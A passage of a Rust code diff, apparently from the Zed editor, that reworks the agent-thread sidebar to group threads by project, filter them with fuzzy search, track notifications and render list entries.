cx.new(|cx| { + let mut editor = Editor::single_line(window, cx); + editor.set_use_modal_editing(true); + editor.set_placeholder_text("Search…", window, cx); + editor + }); - if current_bucket != Some(bucket) { - current_bucket = Some(bucket); - self.entries - .push(SidebarEntry::Separator(bucket.to_string().into())); + cx.subscribe_in( + &multi_workspace, + window, + |this, _multi_workspace, event: &MultiWorkspaceEvent, window, cx| match event { + MultiWorkspaceEvent::ActiveWorkspaceChanged => { + this.observe_draft_editor(cx); + this.update_entries(cx); + } + MultiWorkspaceEvent::WorkspaceAdded(workspace) => { + this.subscribe_to_workspace(workspace, window, cx); + this.update_entries(cx); + } + MultiWorkspaceEvent::WorkspaceRemoved(_) => { + this.update_entries(cx); 
+ } + }, + ) + .detach(); + + cx.subscribe(&filter_editor, |this: &mut Self, _, event, cx| { + if let editor::EditorEvent::BufferEdited = event { + let query = this.filter_editor.read(cx).text(cx); + if !query.is_empty() { + this.selection.take(); + } + this.update_entries(cx); + if !query.is_empty() { + this.select_first_entry(); } - - self.entries.push(SidebarEntry::RecentProject(project)); } - } - } -} - -#[derive(Clone, Copy, Debug, PartialEq, Eq)] -enum TimeBucket { - Today, - Yesterday, - ThisWeek, - PastWeek, - All, -} + }) + .detach(); -impl TimeBucket { - fn from_dates(reference: NaiveDate, date: NaiveDate) -> Self { - if date == reference { - return TimeBucket::Today; - } + cx.observe(&ThreadMetadataStore::global(cx), |this, _store, cx| { + this.update_entries(cx); + }) + .detach(); - if date == reference - TimeDelta::days(1) { - return TimeBucket::Yesterday; - } + cx.observe_flag::(window, |_is_enabled, this, _window, cx| { + this.update_entries(cx); + }) + .detach(); - let week = date.iso_week(); + let workspaces: Vec<_> = multi_workspace.read(cx).workspaces().cloned().collect(); + cx.defer_in(window, move |this, window, cx| { + for workspace in &workspaces { + this.subscribe_to_workspace(workspace, window, cx); + } + this.update_entries(cx); + }); - if reference.iso_week() == week { - return TimeBucket::ThisWeek; + Self { + multi_workspace: multi_workspace.downgrade(), + width: DEFAULT_WIDTH, + focus_handle, + filter_editor, + list_state: ListState::new(0, gpui::ListAlignment::Top, px(1000.)), + contents: SidebarContents::default(), + selection: None, + active_entry: None, + hovered_thread_index: None, + collapsed_groups: HashSet::new(), + expanded_groups: HashMap::new(), + thread_last_accessed: HashMap::new(), + thread_last_message_sent_or_queued: HashMap::new(), + thread_switcher: None, + _thread_switcher_subscriptions: Vec::new(), + view: SidebarView::default(), + recent_projects_popover_handle: PopoverMenuHandle::default(), + 
project_header_menu_ix: None, + _subscriptions: Vec::new(), + _draft_observation: None, } + } - let last_week = (reference - TimeDelta::days(7)).iso_week(); - - if week == last_week { - return TimeBucket::PastWeek; - } + fn serialize(&mut self, cx: &mut Context) { + cx.emit(workspace::SidebarEvent::SerializeNeeded); + } - TimeBucket::All + fn active_entry_workspace(&self) -> Option<&Entity> { + self.active_entry.as_ref().map(|entry| entry.workspace()) } -} -impl Display for TimeBucket { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - match self { - TimeBucket::Today => write!(f, "Today"), - TimeBucket::Yesterday => write!(f, "Yesterday"), - TimeBucket::ThisWeek => write!(f, "This Week"), - TimeBucket::PastWeek => write!(f, "Past Week"), - TimeBucket::All => write!(f, "All"), - } + fn is_active_workspace(&self, workspace: &Entity, cx: &App) -> bool { + self.multi_workspace + .upgrade() + .map_or(false, |mw| mw.read(cx).workspace() == workspace) } -} -fn open_recent_project(paths: Vec, window: &mut Window, cx: &mut App) { - let Some(handle) = window.window_handle().downcast::() else { - return; - }; + fn subscribe_to_workspace( + &mut self, + workspace: &Entity, + window: &mut Window, + cx: &mut Context, + ) { + let project = workspace.read(cx).project().clone(); + cx.subscribe_in( + &project, + window, + |this, _project, event, _window, cx| match event { + ProjectEvent::WorktreeAdded(_) + | ProjectEvent::WorktreeRemoved(_) + | ProjectEvent::WorktreeOrderChanged => { + this.update_entries(cx); + } + _ => {} + }, + ) + .detach(); - cx.defer(move |cx| { - if let Some(task) = handle - .update(cx, |multi_workspace, window, cx| { - multi_workspace.open_project(paths, window, cx) - }) - .log_err() - { - task.detach_and_log_err(cx); - } - }); -} + let git_store = workspace.read(cx).project().read(cx).git_store().clone(); + cx.subscribe_in( + &git_store, + window, + |this, _, event: &project::git_store::GitStoreEvent, _window, cx| { + if matches!( + 
event, + project::git_store::GitStoreEvent::RepositoryUpdated( + _, + project::git_store::RepositoryEvent::GitWorktreeListChanged, + _, + ) + ) { + this.update_entries(cx); + } + }, + ) + .detach(); -impl PickerDelegate for WorkspacePickerDelegate { - type ListItem = AnyElement; + cx.subscribe_in( + workspace, + window, + |this, _workspace, event: &workspace::Event, window, cx| { + if let workspace::Event::PanelAdded(view) = event { + if let Ok(agent_panel) = view.clone().downcast::() { + this.subscribe_to_agent_panel(&agent_panel, window, cx); + } + } + }, + ) + .detach(); - fn match_count(&self) -> usize { - self.matches.len() - } + self.observe_docks(workspace, cx); - fn selected_index(&self) -> usize { - self.selected_index + if let Some(agent_panel) = workspace.read(cx).panel::(cx) { + self.subscribe_to_agent_panel(&agent_panel, window, cx); + self.observe_draft_editor(cx); + } } - fn set_selected_index( + fn subscribe_to_agent_panel( &mut self, - ix: usize, - _window: &mut Window, - _cx: &mut Context>, + agent_panel: &Entity, + window: &mut Window, + cx: &mut Context, ) { - self.selected_index = ix; + cx.subscribe_in( + agent_panel, + window, + |this, agent_panel, event: &AgentPanelEvent, _window, cx| match event { + AgentPanelEvent::ActiveViewChanged => { + let is_new_draft = agent_panel + .read(cx) + .active_conversation_view() + .is_some_and(|cv| cv.read(cx).parent_id(cx).is_none()); + if is_new_draft { + if let Some(active_workspace) = this + .multi_workspace + .upgrade() + .map(|mw| mw.read(cx).workspace().clone()) + { + this.active_entry = Some(ActiveEntry::Draft(active_workspace)); + } + } + this.observe_draft_editor(cx); + this.update_entries(cx); + } + AgentPanelEvent::ThreadFocused | AgentPanelEvent::BackgroundThreadChanged => { + this.update_entries(cx); + } + AgentPanelEvent::MessageSentOrQueued { session_id } => { + this.record_thread_message_sent(session_id); + this.update_entries(cx); + } + }, + ) + .detach(); } - fn can_select( - &mut self, - 
ix: usize, - _window: &mut Window, - _cx: &mut Context>, - ) -> bool { - match self.matches.get(ix) { - Some(SidebarMatch { - entry: SidebarEntry::Separator(_), - .. - }) => false, - _ => true, + fn observe_docks(&mut self, workspace: &Entity, cx: &mut Context) { + let docks: Vec<_> = workspace + .read(cx) + .all_docks() + .into_iter() + .cloned() + .collect(); + let workspace = workspace.downgrade(); + for dock in docks { + let workspace = workspace.clone(); + cx.observe(&dock, move |this, _dock, cx| { + let Some(workspace) = workspace.upgrade() else { + return; + }; + if !this.is_active_workspace(&workspace, cx) { + return; + } + + cx.notify(); + }) + .detach(); } } - fn placeholder_text(&self, _window: &mut Window, _cx: &mut App) -> Arc { - "Search…".into() + fn observe_draft_editor(&mut self, cx: &mut Context) { + self._draft_observation = self + .multi_workspace + .upgrade() + .and_then(|mw| { + let ws = mw.read(cx).workspace(); + ws.read(cx).panel::(cx) + }) + .and_then(|panel| { + let cv = panel.read(cx).active_conversation_view()?; + let tv = cv.read(cx).active_thread()?; + Some(tv.read(cx).message_editor.clone()) + }) + .map(|editor| { + cx.observe(&editor, |_this, _editor, cx| { + cx.notify(); + }) + }); } - fn no_matches_text(&self, _window: &mut Window, _cx: &mut App) -> Option { - if self.query.is_empty() { + fn active_draft_text(&self, cx: &App) -> Option { + let mw = self.multi_workspace.upgrade()?; + let workspace = mw.read(cx).workspace(); + let panel = workspace.read(cx).panel::(cx)?; + let conversation_view = panel.read(cx).active_conversation_view()?; + let thread_view = conversation_view.read(cx).active_thread()?; + let raw = thread_view.read(cx).message_editor.read(cx).text(cx); + let cleaned = Self::clean_mention_links(&raw); + let mut text: String = cleaned.split_whitespace().collect::>().join(" "); + if text.is_empty() { None } else { - Some("No threads match your search.".into()) + const MAX_CHARS: usize = 250; + if let Some((truncate_at, 
_)) = text.char_indices().nth(MAX_CHARS) { + text.truncate(truncate_at); + } + Some(text.into()) } } - fn update_matches( - &mut self, - query: String, - window: &mut Window, - cx: &mut Context>, - ) -> Task<()> { - let query_changed = self.query != query; - self.query = query.clone(); - if query_changed { - self.hovered_thread_item = None; - } - let entries = self.entries.clone(); - - if query.is_empty() { - self.matches = entries - .into_iter() - .map(|entry| SidebarMatch { - entry, - positions: Vec::new(), - }) - .collect(); - - let separator_offset = if self.workspace_thread_count > 0 { - 1 - } else { - 0 - }; - self.selected_index = (self.active_workspace_index + separator_offset) - .min(self.matches.len().saturating_sub(1)); - return Task::ready(()); + fn clean_mention_links(input: &str) -> String { + let mut result = String::with_capacity(input.len()); + let mut remaining = input; + + while let Some(start) = remaining.find("[@") { + result.push_str(&remaining[..start]); + let after_bracket = &remaining[start + 1..]; // skip '[' + if let Some(close_bracket) = after_bracket.find("](") { + let mention = &after_bracket[..close_bracket]; // "@something" + let after_link_start = &after_bracket[close_bracket + 2..]; // after "](" + if let Some(close_paren) = after_link_start.find(')') { + result.push_str(mention); + remaining = &after_link_start[close_paren + 1..]; + continue; + } + } + // Couldn't parse full link syntax — emit the literal "[@" and move on. 
+ result.push_str("[@"); + remaining = &remaining[start + 2..]; } + result.push_str(remaining); + result + } - let executor = cx.background_executor().clone(); - cx.spawn_in(window, async move |picker, cx| { - let matches = cx - .background_spawn(async move { - let data_entries: Vec<(usize, &SidebarEntry)> = entries - .iter() - .enumerate() - .filter(|(_, entry)| !matches!(entry, SidebarEntry::Separator(_))) - .collect(); - - let candidates: Vec = data_entries - .iter() - .enumerate() - .map(|(candidate_index, (_, entry))| { - StringMatchCandidate::new(candidate_index, entry.searchable_text()) - }) - .collect(); - - let search_matches = fuzzy::match_strings( - &candidates, - &query, - false, - true, - MAX_MATCHES, - &Default::default(), - executor, - ) - .await; - - let mut workspace_matches = Vec::new(); - let mut project_matches = Vec::new(); - - for search_match in search_matches { - let (original_index, _) = data_entries[search_match.candidate_id]; - let entry = entries[original_index].clone(); - let sidebar_match = SidebarMatch { - positions: search_match.positions, - entry: entry.clone(), - }; - match entry { - SidebarEntry::WorkspaceThread(_) => { - workspace_matches.push(sidebar_match) - } - SidebarEntry::RecentProject(_) => project_matches.push(sidebar_match), - SidebarEntry::Separator(_) => {} - } - } + /// Finds an open workspace whose project group key matches the given path list. 
+ fn workspace_for_group(&self, path_list: &PathList, cx: &App) -> Option> { + let mw = self.multi_workspace.upgrade()?; + let mw = mw.read(cx); + mw.workspaces() + .find(|ws| ws.read(cx).project_group_key(cx).path_list() == path_list) + .cloned() + } - let mut result = Vec::new(); - if !workspace_matches.is_empty() { - result.push(SidebarMatch { - entry: SidebarEntry::Separator("Active Workspaces".into()), - positions: Vec::new(), - }); - result.extend(workspace_matches); - } - if !project_matches.is_empty() { - result.push(SidebarMatch { - entry: SidebarEntry::Separator("Recent Projects".into()), - positions: Vec::new(), - }); - result.extend(project_matches); - } - result - }) - .await; + /// Opens a new workspace for a group that has no open workspaces. + fn open_workspace_for_group( + &mut self, + path_list: &PathList, + window: &mut Window, + cx: &mut Context, + ) { + let Some(multi_workspace) = self.multi_workspace.upgrade() else { + return; + }; - picker - .update_in(cx, |picker, _window, _cx| { - picker.delegate.matches = matches; - if picker.delegate.matches.is_empty() { - picker.delegate.selected_index = 0; - } else { - let first_selectable = picker - .delegate - .matches - .iter() - .position(|m| !matches!(m.entry, SidebarEntry::Separator(_))) - .unwrap_or(0); - picker.delegate.selected_index = first_selectable; - } - }) - .log_err(); - }) + multi_workspace + .update(cx, |this, cx| { + this.find_or_create_local_workspace(path_list.clone(), window, cx) + }) + .detach_and_log_err(cx); } - fn confirm(&mut self, _secondary: bool, window: &mut Window, cx: &mut Context>) { - let Some(selected_match) = self.matches.get(self.selected_index) else { + /// Rebuilds the sidebar contents from current workspace and thread state. + /// + /// Iterates [`MultiWorkspace::project_group_keys`] to determine project + /// groups, then populates thread entries from the metadata store and + /// merges live thread info from active agent panels. 
+ /// + /// Aim for a single forward pass over workspaces and threads plus an + /// O(T log T) sort. Avoid adding extra scans over the data. + /// + /// Properties: + /// + /// - Should always show every workspace in the multiworkspace + /// - If you have no threads, and two workspaces for the worktree and the main workspace, make sure at least one is shown + /// - Should always show every thread, associated with each workspace in the multiworkspace + /// - After every build_contents, our "active" state should exactly match the current workspace's, current agent panel's current thread. + fn rebuild_contents(&mut self, cx: &App) { + let Some(multi_workspace) = self.multi_workspace.upgrade() else { return; }; - - match &selected_match.entry { - SidebarEntry::Separator(_) => {} - SidebarEntry::WorkspaceThread(thread_entry) => { - let target_index = thread_entry.index; - self.multi_workspace.update(cx, |multi_workspace, cx| { - multi_workspace.activate_index(target_index, window, cx); - }); - } - SidebarEntry::RecentProject(project_entry) => { - let paths = project_entry.paths.clone(); - open_recent_project(paths, window, cx); + let mw = multi_workspace.read(cx); + let workspaces: Vec<_> = mw.workspaces().cloned().collect(); + let active_workspace = Some(mw.workspace().clone()); + + let agent_server_store = workspaces + .first() + .map(|ws| ws.read(cx).project().read(cx).agent_server_store().clone()); + + let query = self.filter_editor.read(cx).text(cx); + + // Derive active_entry from the active workspace's agent panel. + // Draft is checked first because a conversation can have a session_id + // before any messages are sent. However, a thread that's still loading + // also appears as a "draft" (no messages yet). 
+ if let Some(active_ws) = &active_workspace { + if let Some(panel) = active_ws.read(cx).panel::(cx) { + if panel.read(cx).active_thread_is_draft(cx) + || panel.read(cx).active_conversation_view().is_none() + { + let conversation_parent_id = panel + .read(cx) + .active_conversation_view() + .and_then(|cv| cv.read(cx).parent_id(cx)); + let preserving_thread = + if let Some(ActiveEntry::Thread { session_id, .. }) = &self.active_entry { + self.active_entry_workspace() == Some(active_ws) + && conversation_parent_id + .as_ref() + .is_some_and(|id| id == session_id) + } else { + false + }; + if !preserving_thread { + self.active_entry = Some(ActiveEntry::Draft(active_ws.clone())); + } + } else if let Some(session_id) = panel + .read(cx) + .active_conversation_view() + .and_then(|cv| cv.read(cx).parent_id(cx)) + { + self.active_entry = Some(ActiveEntry::Thread { + session_id, + workspace: active_ws.clone(), + }); + } + // else: conversation exists, not a draft, but no session_id + // yet — thread is mid-load. Keep previous value. 
} } - } - fn dismissed(&mut self, _window: &mut Window, _cx: &mut Context>) {} + let previous = mem::take(&mut self.contents); - fn render_match( - &self, - index: usize, - selected: bool, - _window: &mut Window, - cx: &mut Context>, - ) -> Option { - let match_entry = self.matches.get(index)?; - let SidebarMatch { entry, positions } = match_entry; + let old_statuses: HashMap = previous + .entries + .iter() + .filter_map(|entry| match entry { + ListEntry::Thread(thread) if thread.is_live => { + Some((thread.metadata.session_id.clone(), thread.status)) + } + _ => None, + }) + .collect(); - match entry { - SidebarEntry::Separator(title) => Some( - v_flex() - .when(index > 0, |this| { - this.mt_1() - .gap_2() - .child(Divider::horizontal().color(DividerColor::BorderFaded)) - }) - .child(ListSubHeader::new(title.clone()).inset(true)) - .into_any_element(), - ), - SidebarEntry::WorkspaceThread(thread_entry) => { - let worktree_label = thread_entry.worktree_label.clone(); - let full_path = thread_entry.full_path.clone(); - let thread_info = thread_entry.thread_info.clone(); - let workspace_index = thread_entry.index; - let multi_workspace = self.multi_workspace.clone(); - let workspace_count = self.multi_workspace.read(cx).workspaces().len(); - let is_hovered = self.hovered_thread_item == Some(workspace_index); - - let remove_btn = IconButton::new( - format!("remove-workspace-{}", workspace_index), - IconName::Close, - ) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .tooltip(Tooltip::text("Remove Workspace")) - .on_click({ - let multi_workspace = multi_workspace; - move |_, window, cx| { - multi_workspace.update(cx, |mw, cx| { - mw.remove_workspace(workspace_index, window, cx); - }); + let mut entries = Vec::new(); + let mut notified_threads = previous.notified_threads; + let mut current_session_ids: HashSet = HashSet::new(); + let mut project_header_indices: Vec = Vec::new(); + + let has_open_projects = workspaces + .iter() + .any(|ws| 
!workspace_path_list(ws, cx).paths().is_empty()); + + let resolve_agent_icon = |agent_id: &AgentId| -> (IconName, Option) { + let agent = Agent::from(agent_id.clone()); + let icon = match agent { + Agent::NativeAgent => IconName::ZedAgent, + Agent::Custom { .. } => IconName::Terminal, + }; + let icon_from_external_svg = agent_server_store + .as_ref() + .and_then(|store| store.read(cx).agent_icon(&agent_id)); + (icon, icon_from_external_svg) + }; + + for (group_key, group_workspaces) in mw.project_groups(cx) { + let path_list = group_key.path_list().clone(); + if path_list.paths().is_empty() { + continue; + } + + let label = group_key.display_name(); + + let is_collapsed = self.collapsed_groups.contains(&path_list); + let should_load_threads = !is_collapsed || !query.is_empty(); + + let is_active = active_workspace + .as_ref() + .is_some_and(|active| group_workspaces.contains(active)); + + // Collect live thread infos from all workspaces in this group. + let live_infos: Vec<_> = group_workspaces + .iter() + .flat_map(|ws| all_thread_infos_for_workspace(ws, cx)) + .collect(); + + let mut threads: Vec = Vec::new(); + let mut has_running_threads = false; + let mut waiting_thread_count: usize = 0; + + if should_load_threads { + let mut seen_session_ids: HashSet = HashSet::new(); + let thread_store = ThreadMetadataStore::global(cx); + + // Build a lookup from workspace root paths to their workspace + // entity, used to assign ThreadEntryWorkspace::Open for threads + // whose folder_paths match an open workspace. + let workspace_by_path_list: HashMap> = + group_workspaces + .iter() + .map(|ws| (workspace_path_list(ws, cx), ws)) + .collect(); + + // Resolve a ThreadEntryWorkspace for a thread row. If any open + // workspace's root paths match the thread's folder_paths, use + // Open; otherwise use Closed. 
+ let resolve_workspace = |row: &ThreadMetadata| -> ThreadEntryWorkspace { + workspace_by_path_list + .get(&row.folder_paths) + .map(|ws| ThreadEntryWorkspace::Open((*ws).clone())) + .unwrap_or_else(|| ThreadEntryWorkspace::Closed(row.folder_paths.clone())) + }; + + // Build a ThreadEntry from a metadata row. + let make_thread_entry = |row: ThreadMetadata, + workspace: ThreadEntryWorkspace| + -> ThreadEntry { + let (icon, icon_from_external_svg) = resolve_agent_icon(&row.agent_id); + let worktrees = worktree_info_from_thread_paths(&row.folder_paths, &group_key); + ThreadEntry { + metadata: row, + icon, + icon_from_external_svg, + status: AgentThreadStatus::default(), + workspace, + is_live: false, + is_background: false, + is_title_generating: false, + highlight_positions: Vec::new(), + worktrees, + diff_stats: DiffStats::default(), + } + }; + + // === Main code path: one query per group via main_worktree_paths === + // The main_worktree_paths column is set on all new threads and + // points to the group's canonical paths regardless of which + // linked worktree the thread was opened in. + for row in thread_store + .read(cx) + .entries_for_main_worktree_path(&path_list) + .cloned() + { + if !seen_session_ids.insert(row.session_id.clone()) { + continue; + } + let workspace = resolve_workspace(&row); + threads.push(make_thread_entry(row, workspace)); + } + + // Legacy threads did not have `main_worktree_paths` populated, so they + // must be queried by their `folder_paths`. + + // Load any legacy threads for the main worktrees of this project group. + for row in thread_store.read(cx).entries_for_path(&path_list).cloned() { + if !seen_session_ids.insert(row.session_id.clone()) { + continue; + } + let workspace = resolve_workspace(&row); + threads.push(make_thread_entry(row, workspace)); + } + + // Load any legacy threads for any single linked wortree of this project group. 
+ let mut linked_worktree_paths = HashSet::new(); + for workspace in &group_workspaces { + if workspace.read(cx).visible_worktrees(cx).count() != 1 { + continue; + } + for snapshot in root_repository_snapshots(workspace, cx) { + for linked_worktree in snapshot.linked_worktrees() { + linked_worktree_paths.insert(linked_worktree.path.clone()); + } + } + } + for path in linked_worktree_paths { + let worktree_path_list = PathList::new(std::slice::from_ref(&path)); + for row in thread_store + .read(cx) + .entries_for_path(&worktree_path_list) + .cloned() + { + if !seen_session_ids.insert(row.session_id.clone()) { + continue; + } + threads.push(make_thread_entry( + row, + ThreadEntryWorkspace::Closed(worktree_path_list.clone()), + )); + } + } + + // Build a lookup from live_infos and compute running/waiting + // counts in a single pass. + let mut live_info_by_session: HashMap<&acp::SessionId, &ActiveThreadInfo> = + HashMap::new(); + for info in &live_infos { + live_info_by_session.insert(&info.session_id, info); + if info.status == AgentThreadStatus::Running { + has_running_threads = true; + } + if info.status == AgentThreadStatus::WaitingForConfirmation { + waiting_thread_count += 1; + } + } + + // Merge live info into threads and update notification state + // in a single pass. 
+ for thread in &mut threads { + if let Some(info) = live_info_by_session.get(&thread.metadata.session_id) { + thread.apply_active_info(info); + } + + let session_id = &thread.metadata.session_id; + + let is_active_thread = self.active_entry.as_ref().is_some_and(|entry| { + entry.is_active_thread(session_id) + && active_workspace + .as_ref() + .is_some_and(|active| active == entry.workspace()) + }); + + if thread.status == AgentThreadStatus::Completed + && !is_active_thread + && old_statuses.get(session_id) == Some(&AgentThreadStatus::Running) + { + notified_threads.insert(session_id.clone()); + } + + if is_active_thread && !thread.is_background { + notified_threads.remove(session_id); + } + } + + threads.sort_by(|a, b| { + let a_time = self + .thread_last_message_sent_or_queued + .get(&a.metadata.session_id) + .copied() + .or(a.metadata.created_at) + .or(Some(a.metadata.updated_at)); + let b_time = self + .thread_last_message_sent_or_queued + .get(&b.metadata.session_id) + .copied() + .or(b.metadata.created_at) + .or(Some(b.metadata.updated_at)); + b_time.cmp(&a_time) + }); + } else { + for info in live_infos { + if info.status == AgentThreadStatus::Running { + has_running_threads = true; + } + if info.status == AgentThreadStatus::WaitingForConfirmation { + waiting_thread_count += 1; } + } + } + + if !query.is_empty() { + let workspace_highlight_positions = + fuzzy_match_positions(&query, &label).unwrap_or_default(); + let workspace_matched = !workspace_highlight_positions.is_empty(); + + let mut matched_threads: Vec = Vec::new(); + for mut thread in threads { + let title: &str = &thread.metadata.title; + if let Some(positions) = fuzzy_match_positions(&query, title) { + thread.highlight_positions = positions; + } + let mut worktree_matched = false; + for worktree in &mut thread.worktrees { + if let Some(positions) = fuzzy_match_positions(&query, &worktree.name) { + worktree.highlight_positions = positions; + worktree_matched = true; + } + } + if workspace_matched 
+ || !thread.highlight_positions.is_empty() + || worktree_matched + { + matched_threads.push(thread); + } + } + + if matched_threads.is_empty() && !workspace_matched { + continue; + } + + project_header_indices.push(entries.len()); + entries.push(ListEntry::ProjectHeader { + key: group_key.clone(), + label, + highlight_positions: workspace_highlight_positions, + has_running_threads, + waiting_thread_count, + is_active, }); - let has_notification = self.notified_workspaces.contains(&workspace_index); - let thread_subtitle = thread_info.as_ref().map(|info| info.title.clone()); - let status = thread_info - .as_ref() - .map_or(AgentThreadStatus::default(), |info| info.status); - let running = matches!( - status, - AgentThreadStatus::Running | AgentThreadStatus::WaitingForConfirmation - ); + for thread in matched_threads { + current_session_ids.insert(thread.metadata.session_id.clone()); + entries.push(thread.into()); + } + } else { + let is_draft_for_group = is_active + && matches!(&self.active_entry, Some(ActiveEntry::Draft(ws)) if group_workspaces.contains(ws)); + + project_header_indices.push(entries.len()); + entries.push(ListEntry::ProjectHeader { + key: group_key.clone(), + label, + highlight_positions: Vec::new(), + has_running_threads, + waiting_thread_count, + is_active, + }); - Some( - ThreadItem::new( - ("workspace-item", thread_entry.index), - thread_subtitle.unwrap_or("New Thread".into()), - ) - .icon( - thread_info + if is_collapsed { + continue; + } + + // Emit a DraftThread entry when the active draft belongs to this group. + if is_draft_for_group { + if let Some(ActiveEntry::Draft(draft_ws)) = &self.active_entry { + let ws_path_list = workspace_path_list(draft_ws, cx); + let worktrees = worktree_info_from_thread_paths(&ws_path_list, &group_key); + entries.push(ListEntry::DraftThread { worktrees }); + } + } + + // Emit a NewThread entry when: + // 1. The group has zero threads (convenient affordance). + // 2. 
The active workspace has linked worktrees but no threads + // for the active workspace's specific set of worktrees. + let group_has_no_threads = threads.is_empty() && !group_workspaces.is_empty(); + let active_ws_has_threadless_linked_worktrees = is_active + && !is_draft_for_group + && active_workspace.as_ref().is_some_and(|active_ws| { + let ws_path_list = workspace_path_list(active_ws, cx); + let has_linked_worktrees = + !worktree_info_from_thread_paths(&ws_path_list, &group_key).is_empty(); + if !has_linked_worktrees { + return false; + } + let thread_store = ThreadMetadataStore::global(cx); + let has_threads_for_ws = thread_store + .read(cx) + .entries_for_path(&ws_path_list) + .next() + .is_some() + || thread_store + .read(cx) + .entries_for_main_worktree_path(&ws_path_list) + .next() + .is_some(); + !has_threads_for_ws + }); + + if !is_draft_for_group + && (group_has_no_threads || active_ws_has_threadless_linked_worktrees) + { + let worktrees = if active_ws_has_threadless_linked_worktrees { + active_workspace .as_ref() - .map_or(IconName::ZedAgent, |info| info.icon), + .map(|ws| { + worktree_info_from_thread_paths( + &workspace_path_list(ws, cx), + &group_key, + ) + }) + .unwrap_or_default() + } else { + Vec::new() + }; + entries.push(ListEntry::NewThread { + key: group_key.clone(), + worktrees, + }); + } + + let total = threads.len(); + + let extra_batches = self.expanded_groups.get(&path_list).copied().unwrap_or(0); + let threads_to_show = + DEFAULT_THREADS_SHOWN + (extra_batches * DEFAULT_THREADS_SHOWN); + let count = threads_to_show.min(total); + + let mut promoted_threads: HashSet = HashSet::new(); + + // Build visible entries in a single pass. Threads within + // the cutoff are always shown. 
Threads beyond it are shown + // only if they should be promoted (running, waiting, or + // focused) + for (index, thread) in threads.into_iter().enumerate() { + let is_hidden = index >= count; + + let session_id = &thread.metadata.session_id; + if is_hidden { + let is_promoted = thread.status == AgentThreadStatus::Running + || thread.status == AgentThreadStatus::WaitingForConfirmation + || notified_threads.contains(session_id) + || self.active_entry.as_ref().is_some_and(|active| { + active.matches_entry(&ListEntry::Thread(thread.clone())) + }); + if is_promoted { + promoted_threads.insert(session_id.clone()); + } + if !promoted_threads.contains(session_id) { + continue; + } + } + + current_session_ids.insert(session_id.clone()); + entries.push(thread.into()); + } + + let visible = count + promoted_threads.len(); + let is_fully_expanded = visible >= total; + + if total > DEFAULT_THREADS_SHOWN { + entries.push(ListEntry::ViewMore { + key: group_key.clone(), + is_fully_expanded, + }); + } + } + } + + // Prune stale notifications using the session IDs we collected during + // the build pass (no extra scan needed). + notified_threads.retain(|id| current_session_ids.contains(id)); + + self.thread_last_accessed + .retain(|id, _| current_session_ids.contains(id)); + self.thread_last_message_sent_or_queued + .retain(|id, _| current_session_ids.contains(id)); + + self.contents = SidebarContents { + entries, + notified_threads, + project_header_indices, + has_open_projects, + }; + } + + /// Rebuilds the sidebar's visible entries from already-cached state. 
+ fn update_entries(&mut self, cx: &mut Context) { + let Some(multi_workspace) = self.multi_workspace.upgrade() else { + return; + }; + if !multi_workspace.read(cx).multi_workspace_enabled(cx) { + return; + } + + let had_notifications = self.has_notifications(cx); + let scroll_position = self.list_state.logical_scroll_top(); + + self.rebuild_contents(cx); + + self.list_state.reset(self.contents.entries.len()); + self.list_state.scroll_to(scroll_position); + + if had_notifications != self.has_notifications(cx) { + multi_workspace.update(cx, |_, cx| { + cx.notify(); + }); + } + + cx.notify(); + } + + fn select_first_entry(&mut self) { + self.selection = self + .contents + .entries + .iter() + .position(|entry| matches!(entry, ListEntry::Thread(_))) + .or_else(|| { + if self.contents.entries.is_empty() { + None + } else { + Some(0) + } + }); + } + + fn render_list_entry( + &mut self, + ix: usize, + window: &mut Window, + cx: &mut Context, + ) -> AnyElement { + let Some(entry) = self.contents.entries.get(ix) else { + return div().into_any_element(); + }; + let is_focused = self.focus_handle.is_focused(window); + // is_selected means the keyboard selector is here. + let is_selected = is_focused && self.selection == Some(ix); + + let is_group_header_after_first = + ix > 0 && matches!(entry, ListEntry::ProjectHeader { .. 
}); + + let is_active = self + .active_entry + .as_ref() + .is_some_and(|active| active.matches_entry(entry)); + + let rendered = match entry { + ListEntry::ProjectHeader { + key, + label, + highlight_positions, + has_running_threads, + waiting_thread_count, + is_active: is_active_group, + } => self.render_project_header( + ix, + false, + key, + label, + highlight_positions, + *has_running_threads, + *waiting_thread_count, + *is_active_group, + is_selected, + cx, + ), + ListEntry::Thread(thread) => self.render_thread(ix, thread, is_active, is_selected, cx), + ListEntry::ViewMore { + key, + is_fully_expanded, + } => self.render_view_more(ix, key.path_list(), *is_fully_expanded, is_selected, cx), + ListEntry::DraftThread { worktrees, .. } => { + self.render_draft_thread(ix, is_active, worktrees, is_selected, cx) + } + ListEntry::NewThread { key, worktrees, .. } => { + self.render_new_thread(ix, key, worktrees, is_selected, cx) + } + }; + + if is_group_header_after_first { + v_flex() + .w_full() + .border_t_1() + .border_color(cx.theme().colors().border) + .child(rendered) + .into_any_element() + } else { + rendered + } + } + + fn render_remote_project_icon( + &self, + ix: usize, + host: Option<&RemoteConnectionOptions>, + ) -> Option { + let remote_icon_per_type = match host? 
{ + RemoteConnectionOptions::Wsl(_) => IconName::Linux, + RemoteConnectionOptions::Docker(_) => IconName::Box, + _ => IconName::Server, + }; + + Some( + div() + .id(format!("remote-project-icon-{}", ix)) + .child( + Icon::new(remote_icon_per_type) + .size(IconSize::XSmall) + .color(Color::Muted), + ) + .tooltip(Tooltip::text("Remote Project")) + .into_any_element(), + ) + } + + fn render_project_header( + &self, + ix: usize, + is_sticky: bool, + key: &ProjectGroupKey, + label: &SharedString, + highlight_positions: &[usize], + has_running_threads: bool, + waiting_thread_count: usize, + is_active: bool, + is_focused: bool, + cx: &mut Context, + ) -> AnyElement { + let path_list = key.path_list(); + let host = key.host(); + + let id_prefix = if is_sticky { "sticky-" } else { "" }; + let id = SharedString::from(format!("{id_prefix}project-header-{ix}")); + let disclosure_id = SharedString::from(format!("disclosure-{ix}")); + let group_name = SharedString::from(format!("{id_prefix}header-group-{ix}")); + + let is_collapsed = self.collapsed_groups.contains(path_list); + let (disclosure_icon, disclosure_tooltip) = if is_collapsed { + (IconName::ChevronRight, "Expand Project") + } else { + (IconName::ChevronDown, "Collapse Project") + }; + + let has_new_thread_entry = self.contents.entries.get(ix + 1).is_some_and(|entry| { + matches!( + entry, + ListEntry::NewThread { .. } | ListEntry::DraftThread { .. 
